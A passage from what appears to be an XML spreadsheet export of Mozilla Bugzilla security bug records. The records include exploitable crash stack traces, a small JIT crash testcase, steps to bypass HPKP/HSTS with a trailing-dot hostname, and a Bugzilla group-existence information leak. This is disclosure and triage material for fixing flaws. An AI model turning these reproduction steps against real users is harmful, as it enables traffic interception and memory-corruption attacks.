note: changing default passwords and router ip addresses are responsibilities of the user, however, as the past has shown, we can't expect everyone to have done this. As long as vulnerable routers are in use, I feel firefox should do something to prevent users from falling victim of such attacks("pharming") in light of the phishing protection added in 2.0
note: this is the first bug I have filed, I'm in no way an authority on the field of security or bugzilla and I apologize if I have made a mistake by posting this here and hope the proper admins can move this to the proper category. I have chosen to not make this a "confidential bug" since it's more of a feature request.</t>
        </is>
      </c>
      <c r="X85" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" t="n">
        <v>559241</v>
      </c>
      <c r="B86" t="inlineStr">
        <is>
          <t>2010-04-13 18:17:00 -0700</t>
        </is>
      </c>
      <c r="C86" t="inlineStr">
        <is>
          <t>###!!! ASSERTION: this type of frame can't have overflow containers</t>
        </is>
      </c>
      <c r="D86" t="inlineStr">
        <is>
          <t>2013-05-18 03:20:21 -0700</t>
        </is>
      </c>
      <c r="E86" t="n">
        <v>1</v>
      </c>
      <c r="F86" t="n">
        <v>1</v>
      </c>
      <c r="G86" t="n">
        <v>3</v>
      </c>
      <c r="H86" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I86" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J86" t="inlineStr">
        <is>
          <t>Layout: Block and Inline</t>
        </is>
      </c>
      <c r="K86" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L86" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M86" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N86" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O86" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P86" t="inlineStr">
        <is>
          <t>[sg:critical][critsmash:resolved]</t>
        </is>
      </c>
      <c r="Q86" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R86" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S86" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T86" t="n">
        <v>1</v>
      </c>
      <c r="U86" t="n">
        <v>0</v>
      </c>
      <c r="V86" t="n">
        <v>28</v>
      </c>
      <c r="W86" t="inlineStr">
        <is>
          <t>From bug 537631 comment 2:
========= Jesse Ruderman      2010-04-13 17:43:58 PDT
Also triggers an assertion recently added in bug 509839:
###!!! ASSERTION: this type of frame can't have overflow containers:
'(aProperty != nsContainerFrame::OverflowContainersProperty() &amp;&amp; aProperty !=
nsContainerFrame::ExcessOverflowContainersProperty()) ||
IsFrameOfType(nsIFrame::eCanContainOverflowContainers)', file
/Users/jruderman/mozilla-central/layout/generic/nsContainerFrame.cpp, line 1212</t>
        </is>
      </c>
      <c r="X86" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="87">
      <c r="A87" t="n">
        <v>502832</v>
      </c>
      <c r="B87" t="inlineStr">
        <is>
          <t>2009-07-07 08:16:26 -0700</t>
        </is>
      </c>
      <c r="C87" t="inlineStr">
        <is>
          <t>TM: Crash [@ memcpy]</t>
        </is>
      </c>
      <c r="D87" t="inlineStr">
        <is>
          <t>2014-10-11 15:53:26 -0700</t>
        </is>
      </c>
      <c r="E87" t="n">
        <v>1</v>
      </c>
      <c r="F87" t="n">
        <v>1</v>
      </c>
      <c r="G87" t="n">
        <v>3</v>
      </c>
      <c r="H87" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I87" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J87" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K87" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L87" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M87" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N87" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O87" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P87" t="inlineStr">
        <is>
          <t>[sg:critical] [needs someone to continue to fully reduce the partial testcases]</t>
        </is>
      </c>
      <c r="Q87" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R87" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S87" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T87" t="n">
        <v>1</v>
      </c>
      <c r="U87" t="n">
        <v>0</v>
      </c>
      <c r="V87" t="n">
        <v>38</v>
      </c>
      <c r="W87" t="inlineStr">
        <is>
          <t>see bug 502449 comment 3 and bug 502672. Filing new bug and making sensitive due to stacks etc.
start browser, load http://bonds.finam.ru/issue/info/ , close browser.
on windows only afaict.
on win2k3/1.9.1 build from this weekend with vc 8 express I got.
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at
MSVCR80D!memcpy+0x000000000000005a (Hash=0x1f2a4941.0x39393718)
User mode write access violations that are not near NULL are exploitable.
ChildEBP RetAddr  
0012c558 004e80c2 js3250!js_Invoke+0x95c
0012c5a4 0050aeea js3250!js_fun_apply+0x2c2
0012ccd4 004f70cc js3250!js_Interpret+0x1179a
0012cdb0 004e80c2 js3250!js_Invoke+0x95c
0012cdfc 0050aeea js3250!js_fun_apply+0x2c2
0012d52c 004f70cc js3250!js_Interpret+0x1179a
0012d608 004e80c2 js3250!js_Invoke+0x95c
0012d654 0050aeea js3250!js_fun_apply+0x2c2
0012dd84 004f70cc js3250!js_Interpret+0x1179a
0012de60 012f6c57 js3250!js_Invoke+0x95c
with fresh builds on windows xp and vc 8 pro and 1.9.1/1.9.2 and tracemonkey
&gt;	msvcr80d.dll!memcpy(unsigned char * dst=0x05dc3bdc, unsigned char * src=0x0012b380, unsigned long count=4201)  Line 188	Asm
 	js3250.dll!TraceRecorder::snapshot(ExitType exitType=TIMEOUT_EXIT)  Line 2948 + 0x1a bytes	C++
 	js3250.dll!TraceRecorder::TraceRecorder(JSContext * cx=0x04f99268, VMSideExit * _anchor=0x00000000, nanojit::Fragment * _fragment=0x06a7f958, TreeInfo * ti=0x06a8b4e8, unsigned int stackSlots=4201, unsigned int ngslots=0, JSTraceType_ * typeMap=0x06886068, VMSideExit * innermostNestedGuard=0x00000000, unsigned char * outer=0x00000000, unsigned long outerArgc=0)  Line 1637 + 0xa bytes	C++
 	js3250.dll!js_StartRecorder(JSContext * cx=0x04f99268, VMSideExit * anchor=0x00000000, nanojit::Fragment * f=0x06a7f958, TreeInfo * ti=0x06a8b4e8, unsigned int stackSlots=4201, unsigned int ngslots=0, JSTraceType_ * typeMap=0x06886068, VMSideExit * expectedInnerExit=0x00000000, unsigned char * outer=0x00000000, unsigned long outerArgc=0)  Line 4140 + 0x4b bytes	C++
 	js3250.dll!js_RecordTree(JSContext * cx=0x04f99268, JSTraceMonitor * tm=0x00d264c8, nanojit::Fragment * f=0x06a7f958, unsigned char * outer=0x00000000, unsigned long outerArgc=0, JSObject * globalObj=0x061f3be0, unsigned long globalShape=61629, Queue&lt;unsigned short&gt; * globalSlots=0x00d30758, unsigned long argc=4196)  Line 4440 + 0x3c bytes	C++
 	js3250.dll!js_MonitorLoopEdge(JSContext * cx=0x04f99268, unsigned int &amp; inlineCallCount=0)  Line 5517 + 0x28 bytes	C++
 	js3250.dll!js_Interpret(JSContext * cx=0x04f99268)  Line 3940 + 0x668 bytes	C++
 	js3250.dll!js_Invoke(JSContext * cx=0x04f99268, unsigned int argc=4196, int * vp=0x0699c044, unsigned int flags=0)  Line 1397 + 0x9 bytes	C++
 	js3250.dll!js_fun_apply(JSContext * cx=0x04f99268, unsigned int argc=4196, int * vp=0x07e71514)  Line 2080 + 0x13 bytes	C++
 	js3250.dll!js_Interpret(JSContext * cx=0x04f99268)  Line 5210 + 0x17 bytes	C++
 	js3250.dll!js_Invoke(JSContext * cx=0x04f99268, unsigned int argc=1, int * vp=0x07e71118, unsigned int flags=0)  Line 1397 + 0x9 bytes	C++
 	js3250.dll!js_fun_apply(JSContext * cx=0x04f99268, unsigned int argc=1, int * vp=0x07e710e0)  Line 2080 + 0x13 bytes	C++
 	js3250.dll!js_Interpret(JSContext * cx=0x04f99268)  Line 5210 + 0x17 bytes	C++
 	js3250.dll!js_Invoke(JSContext * cx=0x04f99268, unsigned int argc=1, int * vp=0x07e710d4, unsigned int flags=0)  Line 1397 + 0x9 bytes	C++
 	js3250.dll!js_fun_apply(JSContext * cx=0x04f99268, unsigned int argc=1, int * vp=0x07e7109c)  Line 2080 + 0x13 bytes	C++
 	js3250.dll!js_Interpret(JSContext * cx=0x04f99268)  Line 5210 + 0x17 bytes	C++
 	js3250.dll!js_Invoke(JSContext * cx=0x04f99268, unsigned int argc=1, int * vp=0x07e7106c, unsigned int flags=0)  Line 1397 + 0x9 bytes	C++
 	js3250.dll!js_fun_apply(JSContext * cx=0x04f99268, unsigned int argc=1, int * vp=0x07e71034)  Line 2080 + 0x13 bytes	C++
 	js3250.dll!js_Interpret(JSContext * cx=0x04f99268)  Line 5210 + 0x17 bytes	C++
 	js3250.dll!js_Invoke(JSContext * cx=0x04f99268, unsigned int argc=1, int * vp=0x07e71028, unsigned int flags=0)  Line 1397 + 0x9 bytes	C++</t>
        </is>
      </c>
      <c r="X87" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" t="n">
        <v>1065909</v>
      </c>
      <c r="B88" t="inlineStr">
        <is>
          <t>2014-09-11 01:47:11 -0700</t>
        </is>
      </c>
      <c r="C88" t="inlineStr">
        <is>
          <t>HPKP and HSTS can be bypassed with extra dot in hostname</t>
        </is>
      </c>
      <c r="D88" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:06 -0700</t>
        </is>
      </c>
      <c r="E88" t="n">
        <v>1</v>
      </c>
      <c r="F88" t="n">
        <v>1</v>
      </c>
      <c r="G88" t="n">
        <v>3</v>
      </c>
      <c r="H88" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I88" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J88" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K88" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L88" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M88" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N88" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O88" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P88" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main36+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q88" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R88" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S88" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T88" t="n">
        <v>1</v>
      </c>
      <c r="U88" t="n">
        <v>0</v>
      </c>
      <c r="V88" t="n">
        <v>33</v>
      </c>
      <c r="W88" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36
Steps to reproduce:
1. Set "security.cert_pinning.enforcement_level" = "2" (strict-mode) on about:config.
1. Enable "Fiddler Web Debugger" with "Decrypt HTTPS traffic" option.
2. Install Fiddler's root certificate on Firefox.
2. Launch https://play.google.com./ (hostname with extra dot)
Actual results:
Google Play is shown on Firefox even though the host is protected with HPKP.
Expected results:
Secure Connection Failed error screen needs to be shown instead of Google Play in strict-mode.</t>
        </is>
      </c>
      <c r="X88" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="89">
      <c r="A89" t="n">
        <v>1244199</v>
      </c>
      <c r="B89" t="inlineStr">
        <is>
          <t>2016-01-29 10:07:40 -0800</t>
        </is>
      </c>
      <c r="C89" t="inlineStr">
        <is>
          <t>Need way to mark buildbot jobs as Tier-3</t>
        </is>
      </c>
      <c r="D89" t="inlineStr">
        <is>
          <t>2016-02-02 15:55:20 -0800</t>
        </is>
      </c>
      <c r="E89" t="n">
        <v>1</v>
      </c>
      <c r="F89" t="n">
        <v>1</v>
      </c>
      <c r="G89" t="n">
        <v>7</v>
      </c>
      <c r="H89" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I89" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J89" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K89" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L89" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M89" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N89" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O89" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P89" t="inlineStr"/>
      <c r="Q89" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R89" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S89" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T89" t="n">
        <v>1</v>
      </c>
      <c r="U89" t="n">
        <v>0</v>
      </c>
      <c r="V89" t="n">
        <v>4</v>
      </c>
      <c r="W89" t="inlineStr">
        <is>
          <t>We currently do this for Tier-2 jobs, but we need to extend it to work for Tier-3.  We are moving all B2G jobs to Tier-3, so this is important to do now.</t>
        </is>
      </c>
      <c r="X89" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="90">
      <c r="A90" t="n">
        <v>153051</v>
      </c>
      <c r="B90" t="inlineStr">
        <is>
          <t>2002-06-20 01:57:55 -0700</t>
        </is>
      </c>
      <c r="C90" t="inlineStr">
        <is>
          <t>bugzilla-daemon@mozilla.org-replies should give explanation</t>
        </is>
      </c>
      <c r="D90" t="inlineStr">
        <is>
          <t>2011-06-26 22:59:39 -0700</t>
        </is>
      </c>
      <c r="E90" t="n">
        <v>1</v>
      </c>
      <c r="F90" t="n">
        <v>1</v>
      </c>
      <c r="G90" t="n">
        <v>7</v>
      </c>
      <c r="H90" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I90" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J90" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K90" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L90" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M90" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N90" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O90" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P90" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q90" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R90" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S90" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T90" t="n">
        <v>1</v>
      </c>
      <c r="U90" t="n">
        <v>0</v>
      </c>
      <c r="V90" t="n">
        <v>11</v>
      </c>
      <c r="W90" t="inlineStr">
        <is>
          <t>Newcomers often try to reply to bug-mail. But mail to
bugzilla-daemon@mozilla.org gets bounced without an explanation, resulting in a
huge amount of mails sent to the personal addresses of people who triage bugs.
Couldn't the auto-replier send something like:
"I'm sorry, you can't comment on bugs via email. Please go to
the URL given in the bugzilla-mail you've received to comment.
Bugzilla mails are only meant to inform you about the current
state of the bug. To change he way bugzilla sends you mail,
please go to 
http://bugzilla.mozilla.org/userprefs.cgi?tab=email
Thank you for testing mozilla."
Bug 56319 is similar but more targeted at the possibility to
actually reply to bugmail.</t>
        </is>
      </c>
      <c r="X90" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="91">
      <c r="A91" t="n">
        <v>672436</v>
      </c>
      <c r="B91" t="inlineStr">
        <is>
          <t>2011-07-18 20:50:55 -0700</t>
        </is>
      </c>
      <c r="C91" t="inlineStr">
        <is>
          <t>Assertion failure: priv-&gt;stackElems + stackDepth == elem</t>
        </is>
      </c>
      <c r="D91" t="inlineStr">
        <is>
          <t>2015-10-16 11:41:52 -0700</t>
        </is>
      </c>
      <c r="E91" t="n">
        <v>1</v>
      </c>
      <c r="F91" t="n">
        <v>1</v>
      </c>
      <c r="G91" t="n">
        <v>3</v>
      </c>
      <c r="H91" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I91" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J91" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K91" t="inlineStr">
        <is>
          <t>7 Branch</t>
        </is>
      </c>
      <c r="L91" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M91" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N91" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O91" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P91" t="inlineStr">
        <is>
          <t>[sg:critical?] js-triage-done [qa-]</t>
        </is>
      </c>
      <c r="Q91" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R91" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S91" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T91" t="n">
        <v>1</v>
      </c>
      <c r="U91" t="n">
        <v>0</v>
      </c>
      <c r="V91" t="n">
        <v>34</v>
      </c>
      <c r="W91" t="inlineStr">
        <is>
          <t>Created attachment 546704
nightly debug stack
1. http://www.android-destek.com/?p=429]...........xrecovery-root
2. Assertion failure: priv-&gt;stackElems + stackDepth == elem, at /work/mozilla/builds/nightly/mozilla/js/src/jsexn.cpp:363
reproduced on Mac, Win Nightly and Aurora. Opt Aurora build didn't crash fwiw.
dmandelin, gal: lots of tracing on the stack.</t>
        </is>
      </c>
      <c r="X91" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" t="n">
        <v>1151139</v>
      </c>
      <c r="B92" t="inlineStr">
        <is>
          <t>2015-04-03 16:50:30 -0700</t>
        </is>
      </c>
      <c r="C92" t="inlineStr">
        <is>
          <t>Racy call to PeerConnectionMedia::num_ice_media_streams from PeerConnectionImpl::BuildStatsQuery_m</t>
        </is>
      </c>
      <c r="D92" t="inlineStr">
        <is>
          <t>2016-07-02 10:39:32 -0700</t>
        </is>
      </c>
      <c r="E92" t="n">
        <v>1</v>
      </c>
      <c r="F92" t="n">
        <v>1</v>
      </c>
      <c r="G92" t="n">
        <v>3</v>
      </c>
      <c r="H92" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I92" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J92" t="inlineStr">
        <is>
          <t>WebRTC: Signaling</t>
        </is>
      </c>
      <c r="K92" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L92" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M92" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N92" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O92" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P92" t="inlineStr">
        <is>
          <t>[adv-main38+][adv-esr31.7+]</t>
        </is>
      </c>
      <c r="Q92" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R92" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S92" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T92" t="n">
        <v>1</v>
      </c>
      <c r="U92" t="n">
        <v>0</v>
      </c>
      <c r="V92" t="n">
        <v>41</v>
      </c>
      <c r="W92" t="inlineStr">
        <is>
          <t>Marking as security until further analysis can be carried out.
The data structure whose size we're querying in BuildStatsQuery_m is written on STS, meaning we could get literally anything as the return:
https://dxr.mozilla.org/mozilla-central/source/media/webrtc/signaling/src/peerconnection/PeerConnectionImpl.cpp?from=BuildStatsQuery_m&amp;case=true#2905
We need to encode "all streams" in some other way.</t>
        </is>
      </c>
      <c r="X92" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" t="n">
        <v>674497</v>
      </c>
      <c r="B93" t="inlineStr">
        <is>
          <t>2011-07-27 04:26:47 -0700</t>
        </is>
      </c>
      <c r="C93" t="inlineStr">
        <is>
          <t>[SECURITY] Custom searches let you determine if a group exists or not</t>
        </is>
      </c>
      <c r="D93" t="inlineStr">
        <is>
          <t>2011-09-24 05:47:04 -0700</t>
        </is>
      </c>
      <c r="E93" t="n">
        <v>1</v>
      </c>
      <c r="F93" t="n">
        <v>1</v>
      </c>
      <c r="G93" t="n">
        <v>4</v>
      </c>
      <c r="H93" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I93" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J93" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K93" t="inlineStr">
        <is>
          <t>4.1.1</t>
        </is>
      </c>
      <c r="L93" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M93" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N93" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O93" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P93" t="inlineStr"/>
      <c r="Q93" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R93" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S93" t="inlineStr">
        <is>
          <t>Bugzilla 4.2</t>
        </is>
      </c>
      <c r="T93" t="n">
        <v>1</v>
      </c>
      <c r="U93" t="n">
        <v>0</v>
      </c>
      <c r="V93" t="n">
        <v>9</v>
      </c>
      <c r="W93" t="inlineStr">
        <is>
          <t>Regression due to bug 574556, i.e. since Bugzilla 4.1.1:
Run the two queries below:
1) Assignee is equal to %group.foo%
2) Assignee is equal to %group.canconfirm%
In Bugzilla 4.0.x and below, you get the same error message, independently of whether the group exists or not, to not leak this information, see bug 417048. But this regressed again in 4.1.1 as ValidateGroupName() has been replaced by Bugzilla::Group-&gt;check(), which throws an explicit error message if the group doesn't exist.</t>
        </is>
      </c>
      <c r="X93" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" t="n">
        <v>1334776</v>
      </c>
      <c r="B94" t="inlineStr">
        <is>
          <t>2017-01-28 02:36:17 -0800</t>
        </is>
      </c>
      <c r="C94" t="inlineStr">
        <is>
          <t>Header name interning leaks across origins</t>
        </is>
      </c>
      <c r="D94" t="inlineStr">
        <is>
          <t>2018-02-01 16:45:17 -0800</t>
        </is>
      </c>
      <c r="E94" t="n">
        <v>1</v>
      </c>
      <c r="F94" t="n">
        <v>1</v>
      </c>
      <c r="G94" t="n">
        <v>3</v>
      </c>
      <c r="H94" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I94" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J94" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K94" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L94" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M94" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N94" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O94" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P94" t="inlineStr">
        <is>
          <t>[necko-active][fingerprinting][adv-main55+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q94" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R94" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S94" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T94" t="n">
        <v>1</v>
      </c>
      <c r="U94" t="n">
        <v>0</v>
      </c>
      <c r="V94" t="n">
        <v>59</v>
      </c>
      <c r="W94" t="inlineStr">
        <is>
          <t>Created attachment 8831420
web-platform-tests test demonstrating the issue
Apparently the way we do header interning doesn't have any kind of boundary. We should probably limit it to each header list rather than keep a global registry.
I attached a web-platform-test patch demonstrating the issue.
Chrome and Safari do not have this problem as far as I can tell.</t>
        </is>
      </c>
      <c r="X94" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" t="n">
        <v>1199171</v>
      </c>
      <c r="B95" t="inlineStr">
        <is>
          <t>2015-08-27 03:56:51 -0700</t>
        </is>
      </c>
      <c r="C95" t="inlineStr">
        <is>
          <t>Assertion failure: data &gt;&gt; 28 != 0xf (The instruction does not have condition code), at js/src/jit/arm/Assembler-arm.h:1967</t>
        </is>
      </c>
      <c r="D95" t="inlineStr">
        <is>
          <t>2016-02-29 10:28:13 -0800</t>
        </is>
      </c>
      <c r="E95" t="n">
        <v>1</v>
      </c>
      <c r="F95" t="n">
        <v>1</v>
      </c>
      <c r="G95" t="n">
        <v>3</v>
      </c>
      <c r="H95" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I95" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J95" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K95" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L95" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M95" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N95" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O95" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P95" t="inlineStr">
        <is>
          <t>[jsbugmon:update,bisect][fuzzblocker][b2g-adv-main2.5-][adv-main45+]</t>
        </is>
      </c>
      <c r="Q95" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R95" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S95" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T95" t="n">
        <v>1</v>
      </c>
      <c r="U95" t="n">
        <v>0</v>
      </c>
      <c r="V95" t="n">
        <v>23</v>
      </c>
      <c r="W95" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision f61c3cc0eb8b (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --target=i686-pc-linux-gnu --disable-tests --enable-simulator=arm --enable-debug, run with --ion-eager --arm-hwcap=vfp --ion-offthread-compile=off --arm-asm-nop-fill=1 min.js):
gczeal(2);
for (lfLocal in this) {}
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x086dd45a in js::jit::Instruction::extractCond (this=0xf7c40ed8) at js/src/jit/arm/Assembler-arm.h:1967
#0  0x086dd45a in js::jit::Instruction::extractCond (this=0xf7c40ed8) at js/src/jit/arm/Assembler-arm.h:1967
#1  0x086f6776 in extractCond (this=0xf7c40ed8) at js/src/jit/arm/Assembler-arm.cpp:3209
#2  InstIsGuard (ph=&lt;synthetic pointer&gt;, inst=0xf7c40ed8) at js/src/jit/arm/Assembler-arm.cpp:3112
#3  js::jit::Instruction::next (this=0xf7c40ed8) at js/src/jit/arm/Assembler-arm.cpp:3205
#4  0x08745a9b in next (this=0xffffbbd0) at js/src/jit/arm/Assembler-arm.h:2219
#5  js::jit::Assembler::GetCF32Target&lt;js::jit::InstructionIterator&gt; (iter=iter@entry=0xffffbbd0) at js/src/jit/arm/Assembler-arm.cpp:716
#6  0x086fba9e in CodeFromJump (jump=0xffffbbd0) at js/src/jit/arm/Assembler-arm.cpp:855
#7  js::jit::Assembler::TraceJumpRelocations (trc=trc@entry=0xf7a26ee4, code=code@entry=0xf4d5e8d0, reader=...) at js/src/jit/arm/Assembler-arm.cpp:865
#8  0x085a131e in js::jit::JitCode::traceChildren (this=this@entry=0xf4d5e8d0, trc=trc@entry=0xf7a26ee4) at js/src/jit/Ion.cpp:809
#9  0x084c49ff in js::GCMarker::processMarkStackTop (this=this@entry=0xf7a26ee4, budget=...) at js/src/gc/Marking.cpp:1349
#10 0x084a657c in js::GCMarker::drainMarkStack (this=this@entry=0xf7a26ee4, budget=...) at js/src/gc/Marking.cpp:1247
#11 0x087d81de in js::gc::GCRuntime::drainMarkStack (this=this@entry=0xf7a25210, sliceBudget=..., phase=phase@entry=js::gcstats::PHASE_MARK) at js/src/jsgc.cpp:5208
